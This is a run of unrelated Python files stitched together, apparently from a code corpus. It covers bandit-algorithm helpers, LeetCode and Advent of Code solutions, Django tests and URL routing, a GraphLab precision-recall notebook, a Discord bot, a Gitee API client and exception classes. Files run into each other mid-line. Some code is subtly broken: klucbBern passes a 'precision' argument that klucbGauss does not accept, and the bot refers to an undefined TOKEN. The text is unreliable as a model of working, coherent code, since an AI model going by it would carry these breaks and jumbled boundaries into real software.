@jit(nopython=True) def rd_argmax(vector): """ Compute random among eligible maximum indices :param vector: np.array :return: int, random index among eligible maximum indices """ m = np.amax(vector) indices = np.nonzero(vector == m)[0] return np.random.choice(indices) @jit(nopython=True) def rd_choice(vec, size): return np.random.choice(vec, size=size, replace=False) @jit(nopython=True) def hypergeom_sample(s1, n1, n2): return np.random.hypergeometric(s1, n1 - s1, nsample=n2) def rollavg_bottlneck(a, n): """ :param a: array :param n: window of the rolling average :return: """ return bn.move_mean(a, window=n, min_count=n) @jit def klBern(x, y): # Function extracted from the SMPBandits package from Lillian Besson https://github.com/SMPyBandits/SMPyBandits/ x = min(max(x, eps), 1 - eps) y = min(max(y, eps), 1 - eps) return x * log(x / y) + (1 - x) * log((1 - x) / (1 - y)) @jit def klucb(x, d, kl, upperbound, precision=1e-6, lowerbound=float('-inf'), max_iterations=50): # Function extracted from the SMPBandits package from Lillian Besson https://github.com/SMPyBandits/SMPyBandits/ r""" The generic KL-UCB index computation. - ``x``: value of the cum reward, - ``d``: upper bound on the divergence, - ``kl``: the KL divergence to be used (:func:`klBern`, :func:`klGauss`, etc), - ``upperbound``, ``lowerbound=float('-inf')``: the known bound of the values ``x``, - ``precision=1e-6``: the threshold from where to stop the research, - ``max_iterations=50``: max number of iterations of the loop (safer to bound it to reduce time complexity). """ value = max(x, lowerbound) u = upperbound _count_iteration = 0 while _count_iteration < max_iterations and u - value > precision: _count_iteration += 1 m = (value + u) * 0.5 if kl(x, m) > d: u = m else: value = m return (value + u) * 0.5 @jit def klucbBern(x, d, precision=1e-6): # Function extracted from the SMPBandits package from Lillian Besson https://github.com/SMPyBandits/SMPyBandits/ """ KL-UCB index computation for Bernoulli distributions, using :func:`klucb`. """ upperbound = min(1., klucbGauss(x, d, sig2x=0.25, precision=precision)) # variance 1/4 for [0,1] bounded distributions return klucb(x, d, klBern, upperbound, precision) @jit def klucbGauss(x, d, sig2x=0.25): # Function extracted from the SMPBandits package from Lillian Besson https://github.com/SMPyBandits/SMPyBandits/ """ KL-UCB index computation for Gaussian distributions. """ return x + sqrt(abs(2 * sig2x * d)) @jit(nopython=True) def get_leader(Na, Sa, l_prev): """ :param Na: np.array, number of pull of the different arms :param Sa: np.array, cumulative reward of the different arms :param l_prev: previous leader :return: the arm that has been pulled the most, in case of equality the arm the has the highest cumulative reward among the most pulled arms. If several candidates and the previous leader is among them, return the previous leader. Otherwise random choice among the remaining candidates. """ m = np.amax(Na) n_argmax = np.nonzero(Na == m)[0] if n_argmax.shape[0] == 1: l = n_argmax[0] return l else: s_max = Sa[n_argmax].max() s_argmax = np.nonzero(Sa[n_argmax] == s_max)[0] if np.nonzero(n_argmax[s_argmax] == l_prev)[0].shape[0] > 0: return l_prev return n_argmax[np.random.choice(s_argmax)] @jit(nopython=True) def get_leader_ns(Na, Sa, l_prev, r, tau, K, winners): """ :param Na: np.array, number of pull of the different arms :param Sa: np.array, cumulative reward of the different arms :param l_prev: previous leader :param r: current round :param tau: sliding window length :param K: number of arms :param winners: np.array, contains of 1 at position k if arm k has won its duel against l_prev :return: the arm that has been pulled the most, in case of equality the arm the has the highest cumulative reward among the most pulled arms. If several candidates and the previous leader is among them, return the previous leader. Otherwise random choice among the remaining candidates. """ if Na[l_prev] < min(r, tau) / (2 * K): b_r = np.ones(K) else: b_r = winners * (Na >= min(r, tau) / K) b_r[l_prev] = 1 m = np.amax(b_r * Na) n_argmax = np.nonzero((Na * b_r) == m)[0] if n_argmax.shape[0] == 1: l = n_argmax[0] return l else: s_max = (Sa * b_r)[n_argmax].max() s_argmax = np.nonzero((Sa * b_r)[n_argmax] == s_max)[0] if np.nonzero(n_argmax[s_argmax] == l_prev)[0].shape[0] > 0: return l_prev return n_argmax[np.random.choice(s_argmax)] def get_SSMC_star_min(rewards_l, n_challenger, reshape_size): return (np.array(rewards_l)[:n_challenger * reshape_size].reshape( (reshape_size, n_challenger))).mean(axis=1).min() def convert_tg_mean(mu, scale, step=1e-7): X = np.arange(0, 1, step) return (X * sc.norm.pdf(X, loc=mu, scale=scale)).mean() + 1 - sc.norm.cdf(1, loc=mu, scale=scale) def traj_arms(param_start, chg_dist, T): nb_arms = len(param_start) l_index = list(chg_dist.keys()) mean_arms = [np.zeros(T) for i in range(nb_arms)] idx_index = 0 for t in range(T): for arm in range(nb_arms): if idx_index < len(l_index): if t >= int(l_index[idx_index]): idx_index += 1 if idx_index == 0: if type(param_start[arm]) == list: mean_arms[arm][t] = param_start[arm][0] else: mean_arms[arm][t] = param_start[arm] else: if type(chg_dist[l_index[idx_index - 1]][1][arm]) == list: mean_arms[arm][t] = chg_dist[l_index[idx_index - 1]][1][arm][0] else: mean_arms[arm][t] = chg_dist[l_index[idx_index - 1]][1][arm] return mean_arms def plot_mean_arms(mean_arms, color_list, marker_list): n = len(mean_arms) T = len(mean_arms[0]) for i in range(n): if i == 0: plt.plot(mean_arms[i], color=color_list[i], label='Arm ' + str(i + 1)) else: plt.plot(mean_arms[i], color=color_list[i], marker=marker_list[i-1], markersize=8, markevery=T//10, label='Arm ' + str(i + 1)) plt.legend() plt.show() return 0 # The isBadVersion API is already defined for you. # @param version, an integer # @return a bool # def isBadVersion(version): class Solution(object): def firstBadVersion(self, n, start=1, end=None): """ :type n: int :rtype: int """ # set end var if it's undefined if not end: end = n # base case: n is 1 if end == start: if isBadVersion(end): return end else: return end+1 # if only 2 versions if end-start == 1: if isBadVersion(start): return start else: return end next = (end+start)//2 # if mid is bad version, look ahead if isBadVersion(next): return self.firstBadVersion(n, start, next) # else look behind else: return self.firstBadVersion(n, next, end) import time def main(): results = [] with open('21-input.txt', 'r') as f: input = [i.strip() for i in f.read().splitlines()] # A list of all ingredients, duplicated as per input ingredient_list = [] # A map of all allergens to their possible ingredients all_allergens = {} # A set of known allergenic ingredients allergenic_ingredients = set() # A set of all ingredients all_ingredients = set() for i in input: parts = i.split(' (contains ') ingredients = set([ingredient for ingredient in parts[0].split(' ')]) ingredient_list.extend(ingredients) all_ingredients.update(ingredients) allergens = parts[1][:-1].split(', ') for allergen in allergens: if allergen in all_allergens: all_allergens[allergen] = all_allergens[allergen] & ingredients else: all_allergens[allergen] = ingredients solved = False while not solved: solved = True for _,(k,v) in enumerate(all_allergens.items()): if len(v) > 1: solved = False else: (single_ingredient,) = v allergenic_ingredients.add(single_ingredient) for k in all_allergens: if len(all_allergens[k]) > 1: all_allergens[k] = all_allergens[k] - allergenic_ingredients results.append(len([i for i in ingredient_list if i not in allergenic_ingredients])) print(all_allergens) ordered_ingredients = [] for _,(k,v) in enumerate(sorted(all_allergens.items())): (ingredient,) = v ordered_ingredients.append(ingredient) results.append(','.join(ordered_ingredients)) for i,s in enumerate(results): print(f'{i+1}: {s}') if __name__ == '__main__': start_time = time.time_ns() main() print("--- Executed in {0:.3f} seconds ---".format((time.time_ns() - start_time) / (10 ** 9)))import tensorflow as tf from tensorflow.contrib import slim as slim from avb.ops import * import math def encoder(x, config, is_training=True): df_dim = config['df_dim'] z_dim = config['z_dim'] # Center x at 0 x = 2*x - 1 net = flatten_spatial(x) net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus, scope="fc_0") net = slim.fully_connected(net, 300, activation_fn=tf.nn.softplus, scope="fc_1") zmean = slim.fully_connected(net, z_dim, activation_fn=None) log_zstd = slim.fully_connected(net, z_dim, activation_fn=None) return zmean, log_zstd M0r13n/pricepicker-v21-10 import random import string from sqlalchemy import asc from project.server.models import Device, Repair class TestDevice: def test_order(self, sample_series, sample_color): letters = string.ascii_lowercase devices = [ Device.create(name=''.join(random.choice(letters) for x in range(10)), colors=[sample_color], series=sample_series) for i in range(10) ] assert len(devices) == 10 for i, device in enumerate(devices): assert device.order_index == i def test_normalize(self, sample_series, sample_color): letters = string.ascii_lowercase devices = [ Device.create(name=''.join(random.choice(letters) for x in range(10)), colors=[sample_color], series=sample_series) for i in range(10) ] for d in devices: d.order_index = 0 d.save() Device.normalize() for i, device in enumerate(devices): assert device.order_index == i def test_move_up(self, sample_series, sample_color): letters = string.ascii_lowercase devices = [ Device.create(name=''.join(random.choice(letters) for x in range(10)), colors=[sample_color], series=sample_series) for i in range(10) ] last = devices[-1] last_1 = devices[-2] assert last.order_index > last_1.order_index last.move_up() assert last.order_index < last_1.order_index for i in range(100): last.move_up() assert last.order_index == 0 def test_move_down(self, sample_series, sample_color): letters = string.ascii_lowercase devices = [ Device.create(name=''.join(random.choice(letters) for x in range(10)), colors=[sample_color], series=sample_series) for i in range(10) ] first = devices[0] first_1 = devices[1] assert first.order_index < first_1.order_index first.move_down() assert first.order_index > first_1.order_index for i in range(100): first.move_down() assert first.order_index == 9 class TestRepairSorting: def test_normalize(self, some_devices): for device in some_devices: # Create a display repair, a back-cover and a battery change Repair.create(device=device, name="Display") Repair.create(device=device, name="Back-cover") Repair.create(device=device, name="Battery") # Make sure all repairs were actually created assert Repair.query.count() == len(some_devices) * 3 assert all([r.order_index == 0 for r in Repair.query.all()]) Repair.normalize() repairs = Repair.query.all() # Normalize repairs should sort the repairs for every device # There should only be order indices from 0 to 2 for rep in repairs: assert rep.order_index < 3 assert rep.order_index >= 0 # There should be an even amount of 0,1 and 2 occurrences = { 0: 0, 1: 0, 2: 0 } for rep in repairs: occurrences[rep.order_index] += 1 assert occurrences[0] == len(some_devices) assert occurrences[1] == len(some_devices) assert occurrences[2] == len(some_devices) # For every device there should be a repair with the idx of 0 and 1 and 2 for dev in some_devices: reps = Repair.query.filter(Repair.device_id == dev.id).order_by(asc(Repair.order_index)) assert reps[0].order_index == 0 assert reps[1].order_index == 1 assert reps[2].order_index == 2 def test_query_order_by(self, sample_device): # Create a display repair, a back-cover and a battery change Repair.create(device=sample_device, name="Display") Repair.create(device=sample_device, name="Back-cover") Repair.create(device=sample_device, name="Battery") Repair.normalize() reps = sample_device.repairs assert reps[0].order_index == 0 assert reps[1].order_index == 1 assert reps[2].order_index == 2 def test_move_up(self, some_devices): for device in some_devices: # Create a display repair, a back-cover and a battery change Repair.create(device=device, name="Display") Repair.create(device=device, name="Back-cover") Repair.create(device=device, name="Battery") for i, rep in enumerate(some_devices[0].repairs): rep.order_index = i rep.save() # If I move the last repair one up, it should be swapped with the above original = some_devices[0].repairs some_devices[0].repairs[-1].move_up() now = some_devices[0].repairs assert original[0] == now[0] assert original[1] == now[2] assert original[2] == now[1] # If I move it one more up, it should be swapped with the elem above some_devices[0].repairs[1].move_up() now = some_devices[0].repairs assert original[0] == now[1] assert original[1] == now[2] assert original[2] == now[0] # But if I move it up again nothing should happen some_devices[0].repairs[0].move_up() some_devices[0].repairs[0].move_up() some_devices[0].repairs[0].move_up() some_devices[0].repairs[0].move_up() assert some_devices[0].repairs[0].order_index == 0 # All other repairs should remain unchanged assert all(rep.order_index == 0 for rep in Repair.query.all() if rep.device != some_devices[0]) def test_move_down(self, some_devices): for device in some_devices: # Create a display repair, a back-cover and a battery change Repair.create(device=device, name="Display") Repair.create(device=device, name="Back-cover") Repair.create(device=device, name="Battery") for i, rep in enumerate(some_devices[0].repairs): rep.order_index = i rep.save() device = some_devices[0] # If I move the last repair one down, it should be swapped with the below original = device.repairs device.repairs[0].move_down() now = device.repairs assert original[0] == now[1] assert original[1] == now[0] assert original[2] == now[2] # If I move it one more down, it should be swapped with the elem below device.repairs[1].move_down() now = device.repairs assert original[0] == now[2] assert original[1] == now[0] assert original[2] == now[1] # But if I move it up again nothing should happen device.repairs[-1].move_down() device.repairs[-1].move_down() device.repairs[-1].move_down() device.repairs[-1].move_down() assert device.repairs[-1].order_index == 2 # All other repairs should remain unchanged assert all(rep.order_index == 0 for rep in Repair.query.all() if rep.device != device) modelbrouwers/modelbrouwers1-10 from django.apps import AppConfig from django.utils.translation import ugettext_lazy as _ class MigrationConfig(AppConfig): name = 'brouwers.migration' verbose_name = _('Migrations') 1-10 class Solution: def countPrimeSetBits(self, L, R): """ :type L: int :type R: int :rtype: int """ r = int(math.log2(R)) def is_prime(num): return all(num % factor != 0 for factor in range(2, int(math.sqrt(num)) + 1)) primes = list(map(is_prime, range(r + 1))) primes[:2] = [False] * 2 return sum(primes[bin(num).count('1')] for num in range(L, R + 1)) 1-10 """dashboard URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.9/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Add an import: from blog import urls as blog_urls 2. Import the include() function: from django.conf.urls import url, include 3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls)) """ from django.conf.urls import url, include, patterns from django.contrib import admin from django.conf import settings from django.conf.urls.static import static from django.conf.urls.i18n import i18n_patterns from django.views.i18n import javascript_catalog from .views import ( Index, About, JarvisMenu, ChartTabs, ChartContents, IntegrationTable, BrowserNotSupport, ) urlpatterns = [ # local apps url(r'^accounts/', include('apps.accounts.urls', namespace='accounts')), url(r'^posts/', include('apps.posts.urls', namespace='posts')), url(r'^comments/', include('apps.comments.urls', namespace='comments')), url(r'^events/', include('apps.events.urls', namespace='events')), # i18n url(r'^jsi18n/$', javascript_catalog, name='parse_javascript'), url(r'^set-user-language/(?P[-\w]+)/$', Index.as_view(), name='set_user_language'), # third part url(r'^tracking/', include('tracking.urls')), # watchlist url(r'^set-user-watchlist/(?P\d+)/$', Index.as_view(), name='set_user_watchlist'), ] urlpatterns += i18n_patterns( # admin url(r'^{}/'.format(settings.ADMIN_HIDE_LOGIN), admin.site.urls), # pages url(r'^$', Index.as_view(), name='index'), url(r'^about/', About.as_view(), name='about'), url(r'^browser-not-support/', BrowserNotSupport.as_view(), name='browser_not_support'), # jarvis menu ajax url(r'^jarvismenu/(?P\d+)/(?P\w+)/(?P\d+)/$', JarvisMenu.as_view(), name='jarvismenu'), url(r'^jarvismenu/(?P\d+)/(?P\w+)/(?P\d+)/(?P\w+)/(?P\d+)/$', JarvisMenu.as_view(), name='jarvismenu'), # chart tab ajax url(r'^chart-tab/(?P\d+)/(?P\w+)/(?P\d+)/$', ChartTabs.as_view(), name='chart_tab'), url(r'^chart-tab/(?P\d+)/(?P\w+)/(?P\d+)/(?P\w+)/(?P\d+)/$', ChartTabs.as_view(), name='chart_tab'), # chart content ajax url(r'^chart-content/(?P\d+)/(?P\d+)/(?P\w+)/(?P\d+)/$', ChartContents.as_view(), name='chart_content'), url(r'^chart-content/(?P\d+)/(?P\d+)/(?P\w+)/(?P\d+)/(?P\w+)/(?P\d+)/$', ChartContents.as_view(), name='chart_content'), # chart content ajax url(r'^integration-table/(?P\d+)/(?P\d+)/(?P\w+)/(?P\d+)/$', IntegrationTable.as_view(), name='integration_table'), url(r'^integration-table/(?P\d+)/(?P\d+)/(?P\w+)/(?P\d+)/(?P\w+)/(?P\d+)/$', IntegrationTable.as_view(), name='integration_table'), ) if settings.DEBUG: urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) if settings.SERVE_MEDIA_FILES: urlpatterns += patterns( '', url(r'^%s(?P.*)$' % settings.MEDIA_URL.lstrip('/'), 'django.views.static.serve', {'document_root': settings.MEDIA_ROOT}), ) 10-100 # coding: utf-8 # # Exploring precision and recall # # The goal of this second notebook is to understand precision-recall in the context of classifiers. # # * Use Amazon review data in its entirety. # * Train a logistic regression model. # * Explore various evaluation metrics: accuracy, confusion matrix, precision, recall. # * Explore how various metrics can be combined to produce a cost of making an error. # * Explore precision and recall curves. # # Because we are using the full Amazon review dataset (not a subset of words or reviews), in this assignment we return to using GraphLab Create for its efficiency. As usual, let's start by **firing up GraphLab Create**. # # Make sure you have the latest version of GraphLab Create (1.8.3 or later). If you don't find the decision tree module, then you would need to upgrade graphlab-create using # # ``` # pip install graphlab-create --upgrade # ``` # See [this page](https://dato.com/download/) for detailed instructions on upgrading. # In[1]: import graphlab from __future__ import division import numpy as np graphlab.canvas.set_target('ipynb') # # Load amazon review dataset # In[2]: products = graphlab.SFrame('amazon_baby.gl/') # # Extract word counts and sentiments # As in the first assignment of this course, we compute the word counts for individual words and extract positive and negative sentiments from ratings. To summarize, we perform the following: # # 1. Remove punctuation. # 2. Remove reviews with "neutral" sentiment (rating 3). # 3. Set reviews with rating 4 or more to be positive and those with 2 or less to be negative. # In[3]: def remove_punctuation(text): import string return text.translate(None, string.punctuation) # Remove punctuation. review_clean = products['review'].apply(remove_punctuation) # Count words products['word_count'] = graphlab.text_analytics.count_words(review_clean) # Drop neutral sentiment reviews. products = products[products['rating'] != 3] # Positive sentiment to +1 and negative sentiment to -1 products['sentiment'] = products['rating'].apply(lambda rating : +1 if rating > 3 else -1) # Now, let's remember what the dataset looks like by taking a quick peek: # In[4]: products # ## Split data into training and test sets # # We split the data into a 80-20 split where 80% is in the training set and 20% is in the test set. # In[5]: train_data, test_data = products.random_split(.8, seed=1) # ## Train a logistic regression classifier # # We will now train a logistic regression classifier with **sentiment** as the target and **word_count** as the features. We will set `validation_set=None` to make sure everyone gets exactly the same results. # # Remember, even though we now know how to implement logistic regression, we will use GraphLab Create for its efficiency at processing this Amazon dataset in its entirety. The focus of this assignment is instead on the topic of precision and recall. # In[6]: model = graphlab.logistic_classifier.create(train_data, target='sentiment', features=['word_count'], validation_set=None) # # Model Evaluation # We will explore the advanced model evaluation concepts that were discussed in the lectures. # # ## Accuracy # # One performance metric we will use for our more advanced exploration is accuracy, which we have seen many times in past assignments. Recall that the accuracy is given by # # $$ # \mbox{accuracy} = \frac{\mbox{# correctly classified data points}}{\mbox{# total data points}} # $$ # # To obtain the accuracy of our trained models using GraphLab Create, simply pass the option `metric='accuracy'` to the `evaluate` function. We compute the **accuracy** of our logistic regression model on the **test_data** as follows: # In[7]: accuracy= model.evaluate(test_data, metric='accuracy')['accuracy'] print "Test Accuracy: %s" % accuracy # ## Baseline: Majority class prediction # # Recall from an earlier assignment that we used the **majority class classifier** as a baseline (i.e reference) model for a point of comparison with a more sophisticated classifier. The majority classifier model predicts the majority class for all data points. # # Typically, a good model should beat the majority class classifier. Since the majority class in this dataset is the positive class (i.e., there are more positive than negative reviews), the accuracy of the majority class classifier can be computed as follows: # In[8]: baseline = len(test_data[test_data['sentiment'] == 1])/len(test_data) print "Baseline accuracy (majority class classifier): %s" % baseline # ** Quiz Question:** Using accuracy as the evaluation metric, was our **logistic regression model** better than the baseline (majority class classifier)? # ## Confusion Matrix # # The accuracy, while convenient, does not tell the whole story. For a fuller picture, we turn to the **confusion matrix**. In the case of binary classification, the confusion matrix is a 2-by-2 matrix laying out correct and incorrect predictions made in each label as follows: # ``` # +---------------------------------------------+ # | Predicted label | # +----------------------+----------------------+ # | (+1) | (-1) | # +-------+-----+----------------------+----------------------+ # | True |(+1) | # of true positives | # of false negatives | # | label +-----+----------------------+----------------------+ # | |(-1) | # of false positives | # of true negatives | # +-------+-----+----------------------+----------------------+ # ``` # To print out the confusion matrix for a classifier, use `metric='confusion_matrix'`: # In[10]: confusion_matrix = model.evaluate(test_data, metric='confusion_matrix')['confusion_matrix'] confusion_matrix # **Quiz Question**: How many predicted values in the **test set** are **false positives**? # In[ ]: # ## Computing the cost of mistakes # # # Put yourself in the shoes of a manufacturer that sells a baby product on Amazon.com and you want to monitor your product's reviews in order to respond to complaints. Even a few negative reviews may generate a lot of bad publicity about the product. So you don't want to miss any reviews with negative sentiments --- you'd rather put up with false alarms about potentially negative reviews instead of missing negative reviews entirely. In other words, **false positives cost more than false negatives**. (It may be the other way around for other scenarios, but let's stick with the manufacturer's scenario for now.) # # Suppose you know the costs involved in each kind of mistake: # 1. \$100 for each false positive. # 2. \$1 for each false negative. # 3. Correctly classified reviews incur no cost. # # **Quiz Question**: Given the stipulation, what is the cost associated with the logistic regression classifier's performance on the **test set**? # In[11]: (1433 * 100) + (1406) # ## Precision and Recall # You may not have exact dollar amounts for each kind of mistake. Instead, you may simply prefer to reduce the percentage of false positives to be less than, say, 3.5% of all positive predictions. This is where **precision** comes in: # # $$ # [\text{precision}] = \frac{[\text{# positive data points with positive predicitions}]}{\text{[# all data points with positive predictions]}} = \frac{[\text{# true positives}]}{[\text{# true positives}] + [\text{# false positives}]} # $$ # So to keep the percentage of false positives below 3.5% of positive predictions, we must raise the precision to 96.5% or higher. # # **First**, let us compute the precision of the logistic regression classifier on the **test_data**. # In[12]: precision = model.evaluate(test_data, metric='precision')['precision'] print "Precision on test data: %s" % precision # **Quiz Question**: Out of all reviews in the **test set** that are predicted to be positive, what fraction of them are **false positives**? (Round to the second decimal place e.g. 0.25) # In[15]: 1443 / float(1406 + 3798 + 1443 + 26689) # **Quiz Question:** Based on what we learned in lecture, if we wanted to reduce this fraction of false positives to be below 3.5%, we would: (see the quiz) # A complementary metric is **recall**, which measures the ratio between the number of true positives and that of (ground-truth) positive reviews: # # $$ # [\text{recall}] = \frac{[\text{# positive data points with positive predicitions}]}{\text{[# all positive data points]}} = \frac{[\text{# true positives}]}{[\text{# true positives}] + [\text{# false negatives}]} # $$ # # Let us compute the recall on the **test_data**. # In[16]: recall = model.evaluate(test_data, metric='recall')['recall'] print "Recall on test data: %s" % recall # **Quiz Question**: What fraction of the positive reviews in the **test_set** were correctly predicted as positive by the classifier? # # **Quiz Question**: What is the recall value for a classifier that predicts **+1** for all data points in the **test_data**? # In[17]: (26689 + 1406) / float(1406 + 26689) # # Precision-recall tradeoff # # In this part, we will explore the trade-off between precision and recall discussed in the lecture. We first examine what happens when we use a different threshold value for making class predictions. We then explore a range of threshold values and plot the associated precision-recall curve. # # ## Varying the threshold # # False positives are costly in our example, so we may want to be more conservative about making positive predictions. To achieve this, instead of thresholding class probabilities at 0.5, we can choose a higher threshold. # # Write a function called `apply_threshold` that accepts two things # * `probabilities` (an SArray of probability values) # * `threshold` (a float between 0 and 1). # # The function should return an array, where each element is set to +1 or -1 depending whether the corresponding probability exceeds `threshold`. # In[18]: def apply_threshold(probabilities, threshold): ### YOUR CODE GOES HERE # +1 if >= threshold and -1 otherwise. return probabilities.apply(lambda x: -1 if x < threshold else +1) # Run prediction with `output_type='probability'` to get the list of probability values. Then use thresholds set at 0.5 (default) and 0.9 to make predictions from these probability values. # In[19]: probabilities = model.predict(test_data, output_type='probability') predictions_with_default_threshold = apply_threshold(probabilities, 0.5) predictions_with_high_threshold = apply_threshold(probabilities, 0.9) # In[20]: print "Number of positive predicted reviews (threshold = 0.5): %s" % (predictions_with_default_threshold == 1).sum() # In[21]: print "Number of positive predicted reviews (threshold = 0.9): %s" % (predictions_with_high_threshold == 1).sum() # **Quiz Question**: What happens to the number of positive predicted reviews as the threshold increased from 0.5 to 0.9? # ## Exploring the associated precision and recall as the threshold varies # By changing the probability threshold, it is possible to influence precision and recall. We can explore this as follows: # In[22]: # Threshold = 0.5 precision_with_default_threshold = graphlab.evaluation.precision(test_data['sentiment'], predictions_with_default_threshold) recall_with_default_threshold = graphlab.evaluation.recall(test_data['sentiment'], predictions_with_default_threshold) # Threshold = 0.9 precision_with_high_threshold = graphlab.evaluation.precision(test_data['sentiment'], predictions_with_high_threshold) recall_with_high_threshold = graphlab.evaluation.recall(test_data['sentiment'], predictions_with_high_threshold) # In[23]: print "Precision (threshold = 0.5): %s" % precision_with_default_threshold print "Recall (threshold = 0.5) : %s" % recall_with_default_threshold # In[24]: print "Precision (threshold = 0.9): %s" % precision_with_high_threshold print "Recall (threshold = 0.9) : %s" % recall_with_high_threshold # **Quiz Question (variant 1)**: Does the **precision** increase with a higher threshold? # # **Quiz Question (variant 2)**: Does the **recall** increase with a higher threshold? # ## Precision-recall curve # # Now, we will explore various different values of tresholds, compute the precision and recall scores, and then plot the precision-recall curve. # In[25]: threshold_values = np.linspace(0.5, 1, num=100) print threshold_values # For each of the values of threshold, we compute the precision and recall scores. # In[29]: precision_all = [] recall_all = [] probabilities = model.predict(test_data, output_type='probability') for threshold in threshold_values: predictions = apply_threshold(probabilities, threshold) precision = graphlab.evaluation.precision(test_data['sentiment'], predictions) recall = graphlab.evaluation.recall(test_data['sentiment'], predictions) print "Precision (threshold = %s): %s" % (threshold, precision) print "Recall (threshold = %s) : %s" % (threshold, recall) precision_all.append(precision) recall_all.append(recall) # Now, let's plot the precision-recall curve to visualize the precision-recall tradeoff as we vary the threshold. # In[30]: import matplotlib.pyplot as plt get_ipython().magic(u'matplotlib inline') def plot_pr_curve(precision, recall, title): plt.rcParams['figure.figsize'] = 7, 5 plt.locator_params(axis = 'x', nbins = 5) plt.plot(precision, recall, 'b-', linewidth=4.0, color = '#B0017F') plt.title(title) plt.xlabel('Precision') plt.ylabel('Recall') plt.rcParams.update({'font.size': 16}) plot_pr_curve(precision_all, recall_all, 'Precision recall curve (all)') # **Quiz Question**: Among all the threshold values tried, what is the **smallest** threshold value that achieves a precision of 96.5% or better? Round your answer to 3 decimal places. # In[ ]: # **Quiz Question**: Using `threshold` = 0.98, how many **false negatives** do we get on the **test_data**? (**Hint**: You may use the `graphlab.evaluation.confusion_matrix` function implemented in GraphLab Create.) # In[31]: predictions_98threshold = apply_threshold(probabilities, 0.98) graphlab.evaluation.confusion_matrix(test_data['sentiment'], predictions_98threshold) # This is the number of false negatives (i.e the number of reviews to look at when not needed) that we have to deal with using this classifier. # # Evaluating specific search terms # So far, we looked at the number of false positives for the **entire test set**. In this section, let's select reviews using a specific search term and optimize the precision on these reviews only. After all, a manufacturer would be interested in tuning the false positive rate just for their products (the reviews they want to read) rather than that of the entire set of products on Amazon. # # ## Precision-Recall on all baby related items # # From the **test set**, select all the reviews for all products with the word 'baby' in them. # In[32]: baby_reviews = test_data[test_data['name'].apply(lambda x: 'baby' in x.lower())] # Now, let's predict the probability of classifying these reviews as positive: # In[33]: probabilities = model.predict(baby_reviews, output_type='probability') # Let's plot the precision-recall curve for the **baby_reviews** dataset. # # **First**, let's consider the following `threshold_values` ranging from 0.5 to 1: # In[34]: threshold_values = np.linspace(0.5, 1, num=100) # **Second**, as we did above, let's compute precision and recall for each value in `threshold_values` on the **baby_reviews** dataset. Complete the code block below. # In[35]: precision_all = [] recall_all = [] for threshold in threshold_values: # Make predictions. Use the `apply_threshold` function ## YOUR CODE HERE predictions = apply_threshold(probabilities, threshold) # Calculate the precision. # YOUR CODE HERE precision = graphlab.evaluation.precision(baby_reviews['sentiment'], predictions) # YOUR CODE HERE recall = graphlab.evaluation.recall(baby_reviews['sentiment'], predictions) print "Precision (threshold = %s): %s" % (threshold, precision) print "Recall (threshold = %s) : %s" % (threshold, recall) # Append the precision and recall scores. precision_all.append(precision) recall_all.append(recall) # **Quiz Question**: Among all the threshold values tried, what is the **smallest** threshold value that achieves a precision of 96.5% or better for the reviews of data in **baby_reviews**? Round your answer to 3 decimal places. # In[ ]: 0.863636363636 # **Quiz Question:** Is this threshold value smaller or larger than the threshold used for the entire dataset to achieve the same specified precision of 96.5%? # # **Finally**, let's plot the precision recall curve. # In[36]: plot_pr_curve(precision_all, recall_all, "Precision-Recall (Baby)") # In[ ]: aizakkusnail/test-dpy-ping-bot import discord, os from discord.ext import commands from discord.ext.commands import CommandNotFound client = commands.Bot( command_prefix=commands.when_mentioned_or("c."), intents=discord.Intents.default(), activity=discord.Game(name="c.chat with randos"), status=discord.Status.idle ) client.remove_command("help") @client.event async def on_ready(): print(f"{client.user.name}#{client.user.discriminator} is now up and running.") @client.event async def on_command_error(ctx, error): if isinstance(error, CommandNotFound): return if isinstance(error, commands.CommandOnCooldown): await ctx.send(f'Woops, you still got `{round(error.retry_after, 2)}` seconds before you can use the command again') return raise error @client.command() @commands.cooldown(1, 5, commands.BucketType.user) async def ping(ctx): await ctx.send(f"Pong ({round(client.latency * 1000)}ms)") client.run(TOKEN) 0 import pandas as pd import numpy as np def preprocess(df): df = df.sort_values(by=['date','time_i','sym_root']) N = df.shape[0] assert N%3 == 0 n = int(N/3) ary = np.zeros(shape=(n,3)) for i in range(0,n): row_AAPL = df.iloc[3*i] row_IBM = df.iloc[3*i+1] row_SPY = df.iloc[3*i+2] ary[i][0] = row_AAPL['price'] ary[i][1] = row_IBM['price'] ary[i][2] = row_SPY['price'] print('preprocess finished') return ary import requests import logging logging.basicConfig( level=logging.INFO, filename='./logs/pr.log', format='%(asctime)s - %(name)s - %(levelname)s - %(message)s') logger = logging.getLogger(__name__) class GiteePROperation(): def __init__(self): self.prUrl = 'https://gitee.com/api/v5/repos/{owner}/{repo}/pulls' self.prMergeUrl = self.prUrl + '/{number}/merge' self.access_token = "xxxxx" def merge(self, owner, repo, number): prMergeUrl = self.prMergeUrl.format( owner=owner, repo=repo, number=number) payload = { "access_token": self.access_token, "merge_method": "squash", "prune_source_branch": "true" } r = requests.request( "PUT", prMergeUrl, params=payload, headers={'Content-Type': 'application/json'}) print(r.text) return r.status_code def getPRListWithOpenStatus(self, owner, repo): PRList = [] prUrl = self.prUrl.format(owner=owner, repo=repo) payload = { "access_token": self.access_token, "per_page": 100, "state": "open" } r = requests.request( "GET", prUrl, params=payload, headers={'Content-Type': 'application/json'}) for item in r.json(): PR = item['number'] PRList.append(PR) return PRList bpinsard/nipy # Init for benchmarks for algorithms linuxluigi/meetup-api class MeetupBaseException(Exception): """ All Meetup exceptions inherit from this exception. """ class ClientException(MeetupBaseException): """ Meetup Client Exception base class. """ class TokenError(ClientException): """ There is a problem with the client OAuth token. """ class ApiMethodError(ClientException): """ The called API method is not defined or does not exist. """ class ApiParameterError(ClientException): """ The called API method is missing a required parameter. """ class HttpMethodError(ClientException): """ The requested HTTP Method is not valid. """ class MeetupHttpBaseException(MeetupBaseException): """ All Meetup HTTP Exceptions inherit from this exception. """ class HttpClientError(MeetupHttpBaseException): """ Called when the server tells us there was a client error (4xx). 